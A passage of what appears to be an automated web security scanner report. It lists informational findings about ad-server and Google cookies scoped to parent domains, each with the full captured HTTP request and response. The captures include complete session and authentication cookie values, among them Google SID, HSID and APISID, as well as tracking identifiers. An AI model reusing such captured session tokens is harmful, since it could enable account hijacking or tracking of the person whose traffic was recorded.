P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:52 GMT
Date: Mon, 03 Oct 2011 00:09:52 GMT
Expires: Mon, 03 Oct 2011 00:09:52 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 16:30:33 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
13.42. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6;sz=160x600;click=http://a1.interclick.com/icaid/194896/tid/bc07e8b0-ee36-425c-ab65-77ee7d5dd2f6/click.ic?;ord=634531823360070511? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Set-Cookie: id=cc4c0d83c0000c2||t=1317600005|et=730|cs=002213fd48de979b12208ed0a7; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:05 GMT
Date: Mon, 03 Oct 2011 00:00:05 GMT
Expires: Mon, 03 Oct 2011 00:00:05 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Sep 07 14:26:44 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
13.43. http://ad.doubleclick.net/adj/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/gna.en/level2;tile=1;sz=728x90;ord=940345?area=2l&pos=1&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 463
Set-Cookie: id=c2dc0d83c00000a||t=1317599968|et=730|cs=002213fd481295e253bf9da118; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:59:28 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:59:28 GMT
Date: Sun, 02 Oct 2011 23:59:28 GMT
Expires: Sun, 02 Oct 2011 23:59:28 GMT
Cache-Control: private

document.write('<iframe id=\'a61a57b3\' name=\'a61a57b3\' src=\'http://d.tradex.openx.com/afr.php?zoneid=6393&amp;cb=INSERT_RANDOM_NUMBER_HERE\' frameborder=\'0\' scrolling=\'no\' width=\'728\' height
...[SNIP]...
13.44. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;141652382;20702477;a?http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States
Set-Cookie: id=c9aced83c00000a|644190/486643/15250|t=1317600576|et=730|cs=002213fd4868e541ded676c08a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:36 GMT
Date: Mon, 03 Oct 2011 00:09:36 GMT
Server: GFE/2.0
Content-Type: text/html

13.45. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
13.46. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...
13.47. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...
13.48. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d928398/20/44069375/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d928398/20/44069375/decide.php?ord=1317600550 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:01 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Sun, 03 Oct 2010 00:10:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_928398-1-3; expires=Thu, 22 Nov 2012 16:10:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_928398-C|@~M-Vp; expires=Thu, 22-Nov-2012 16:10:01 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.49. http://api.wipmania.com/jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsonp?callback=jsonp1317602099165&_=1317602106541 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:09 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Set-Cookie: uid=xw/qB06JAz2HWy4DCzpOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/
Content-Length: 157

jsonp1317602099165({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})
13.50. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c;Domain=.google.com;Path=/;Expires=Thu, 30-Sep-2021 00:09:20 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Date: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5319

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23980661-3686120e';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...
13.51. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1317599974.004,wait-%3E10000,&1317599980689 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
